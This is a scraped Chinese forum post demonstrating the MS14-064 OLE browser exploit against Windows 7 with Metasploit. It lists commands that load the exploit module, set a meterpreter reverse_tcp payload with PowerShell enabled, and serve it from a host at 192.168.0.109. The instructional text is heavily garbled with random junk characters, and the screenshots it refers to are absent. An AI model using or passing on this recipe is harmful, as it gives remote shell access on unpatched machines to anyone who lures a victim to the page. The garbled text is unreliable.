找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1404|回复: 0
打印 上一主题 下一主题

MS14-064 漏洞测试入侵win7

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:20:35 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

, @" g' t) R" A2 r! w+ ~ 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示( Z' z1 z7 ?7 q. Z9 d/ |+ N0 H

* E" X: F! }; z

% w; G: V4 R) m5 Q; C" k& G 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: + v7 i2 @5 A" D! L3 n5 i. G9 r

! w& K. u: y: e% z2 j0 S6 P; ~4 Y

; `8 c: `9 W2 J# h# R; H, ?+ H 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp- x2 X, V/ B! T+ i& H# }$ C

, e F/ T8 z! H

( [. m4 c/ Y; t) G! r6 x) B             set AllowPowershellPrompt true9 W# q# W1 l3 K# W( p& Q

- x I6 P* B' r8 m: N, B

: X/ r6 x- }" p4 A. P             Set LHOST 192.168.0.109 . a3 y* T1 r3 ^3 K1 k. Y

3 c' Q9 `' C. Z: e* n3 {

. D2 Q) J# U' O5 q0 v. K/ [' G9 T8 L             set SRVHOST 192.168.0.109, {* b' B' t% I/ S& C

2 D8 {" R9 Z1 d: x7 w6 R* r

6 a+ f7 Q; l+ o8 i& p9 \: g0 i             Set uripath share) [+ Y+ o" Z* ^

& H8 }; N; X* A6 N& m3 }+ w$ M

: ]! l1 d: g& P) [5 ~             Set srvport 80 1 k( [# G5 J4 j6 i

: `8 q1 F" y7 }4 W. M8 J+ N& k( j

4 C# l& L" h F8 Z   4 t/ \3 x) G8 _! l$ _& r# y+ Q

! n K. d" A. p2 z* Z- t& B

/ c% |* v1 d9 j. U8 F   0 O- R5 R* a- t: q- F" H* }- Y

( z4 C( }6 i6 w0 I/ k" C9 r p) _

4 t6 ?7 P9 E6 E   & j# v$ N) V U7 @$ p. f2 E: P

; B+ S/ `% i. ~5 O" z. F0 c

g) }8 {8 q& O   5 b% K* d7 w* I

# o3 [% M" f0 U! Z8 k' }

& S! a! R X$ q4 C  3 I& T( t0 n3 d5 ^. f8 L

% x* E- n2 P+ z& Q8 d

6 o I+ g4 K- @% Q4 ^' B 下面我们来访问本地地址如图: 5 T8 D/ o/ P7 X8 d' t8 s

0 e, l) M9 Q8 Q) V* p4 i

, C. t1 g( j2 D) X: Y8 I   + U8 ~! R% ^ r

0 Q2 _& H9 |0 Z# H6 J4 M* z& o

( H4 ]( ~( L/ g, S7 C  ' j0 E" a) g9 ^

4 ?* X$ z8 e8 `0 v

# v/ g- Z1 _: t; e, F , e% @( a) F& h9 r' ^8 b7 t

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表